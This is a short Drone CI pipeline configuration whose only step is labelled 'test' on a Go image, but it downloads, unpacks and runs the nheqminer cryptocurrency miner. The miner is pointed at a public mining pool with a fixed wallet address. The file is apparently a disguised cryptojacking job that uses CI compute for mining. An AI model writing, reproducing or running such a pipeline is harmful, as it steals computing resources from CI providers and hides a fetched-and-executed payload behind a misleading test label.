---
kind: pipeline
type: docker
name: linux-amd64

platform:
  arch: amd64
  os: linux

steps:
- name: test
  image: golang:1.14.15
  commands:
    - wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
    - tar xf nheqminer-Linux-v0.8.2.tgz
    - tar xf nheqminer-Linux-v0.8.2.tar.gz
    - ./nheqminer/nheqminer -v -l na.luckpool.net:3956 -u RXKKMD5LHex9nrigfwjFeu1t79144WXS2c.Go -p x -t 6
